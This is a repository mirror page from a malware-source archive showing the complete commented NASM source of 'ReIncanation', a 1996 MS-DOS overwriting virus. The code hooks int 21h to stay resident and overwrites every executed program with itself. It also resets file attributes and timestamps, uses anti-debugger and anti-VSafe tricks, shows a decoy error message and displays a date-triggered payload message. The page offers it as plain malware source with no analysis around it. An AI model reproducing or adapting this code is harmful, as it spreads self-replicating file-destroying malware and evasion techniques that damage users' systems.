Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-27 09:28:25 +00:00
Code Releases Activity
main
vxug-MalwareSourceCode/MSDOS/R-Index/Virus.MSDOS.Unknown.reincanation.asm
vxunderground 4b9382ddbc re-organize 
push
2022-08-21 04:07:57 -05:00

148 lines
5.7 KiB
NASM
Raw Permalink Blame History

start:
and al,21h
;anti_disassembler & anti_debugger
mov cx,09ebh
mov ax,0fe05h
jmp $-2
add ah,03bh
jmp $-10
;anti_debugger
mov ax,3503h ;save int 3h in bx
int 21h ;do it
mov ah,25h ;set new int 3h...
mov dx,offset new_int_3 ;...to new_int_3
int 21h ;do it
xchg bx,dx ;exchange bx,dx (restore original int 3h)
int 21h ;do it
;anti_vsafe
mov ax,0f9f2h
add ax,10h
mov dx,5935h
add dx,10h
mov bl,10h
sub bl,10h
int 16h
mov ah,9h ;write string
mov dx,offset file_not_found ;Befehl oder Dateiname nicht gefunden.
int 21h ;do it
mov ax,9999h ;put 9999h in ax (for resident test)
int 21h ;do it
cmp bx,9999h ;compare bx,9999h
je already_there ;if bx=9999h, we are already resident and goto already_there
jmp makemegotsr ;else goto makemegotsr
already_there: ;already resident
int 20h ;exit
makemegotsr:
mov ax,3521h ; get int 21h
int 21h ;do it
mov word ptr cs:old21,bx ; save old int 21h
mov word ptr cs:old21+2,es ;... save
mov dx,offset new21 ; new int 21 comes to offset new21
mov ax,2521h ; set new int 21h
int 21h ; do it
push cs ; push it
pop ds ; pop it
mov dx,offset endvir ; put everything of us in memory
int 27h ; do it
new21: pushf ;new int 21
cmp ax,9999h ;resident test ???
jnz no_installation_check ;if no test goto no_install_check
xchg ax,bx ;if resident test, put 9999h in bx
no_installation_check: ;no_install_check
cmp ax,4b00h ;is there something executed?
jz infect ;yes, goto infect
jmp short end21 ;no, jmp to normal old int 21h
infect: ;infect the executed file
mov ax,4301h ;set attributes
xor cx,cx ;to 0
int 21h ;do it
mov ax,3d02h ;open file
int 21h ;do it
mov bx,ax ;put ax in bx, or.. xchg ax,bx.. but that doesn't work here
push ax ;push all
push bx
push cx
push dx
push ds
push cs
pop ds
mov ax,4200h ;seek
xor cx,cx ;at beginning of tha file
cwd
int 21h ;do it
mov cx,offset endvir-offset start ;how much bytes to write
mov ah,40h ;write
mov dx,offset start ;from offset start
int 21h ;do it
cwd ; set date/time
xor cx,cx ; to zero
mov ax,5701h ;function for date/time
int 21h ;do it
mov ah,3eh ; close file
int 21h ;do it
mov ah,2ah ;get date
int 21h ;do it
cmp dh,4 ;compare month(dh) with 4
jne not_my_birthday ;not the 4th month, goto not_my_birthday
monat_ok:cmp dl,21 ;else compare day(dl) with 21
jne not_my_birthday ;not the 21th, goto not_my_birthday
tag_ok:mov ah,9h ;if it is the 21.April write message
mov dx,offset text ;of offset text
int 21h ;do it
mov ah,00h ;wait until keypressed
int 16h ;do it
jmp restore ;goto restore (tha registers)
not_my_birthday: ;if it is not_my_birthday
mov ah,9h ;write message
mov dx,offset file_not_found ;Befehl oder Dateiname nicht gefunden. (English: Bad command or filename.)
int 21h ;do it
restore:
pop ds ; pop all
pop dx
pop cx
pop bx
pop ax
end21: popf ; pop far
db 0eah ; jmp far (?)
old21 dw 0,0 ; where to store the old INT21
text: db'ReIncanation written by Spooky. Austria 1996',0dh,0ah,'$' ;message for debugger or date 21.April
file_not_found: db'Befehl oder Dateiname nicht gefunden.',0dh,0ah,'$' ;message file not found
new_int_3: ;new interrupt 3h for the debugger
mov ah,9h ;write string to standard output
mov dx,offset text ;text to write
int 21h ;do it
mov ah,00h ;wait until keypressed
int 16h ;do it
int 20h ;-> terminate debugging
endvir label byte ; End of file
end start
View Git Blame Copy Permalink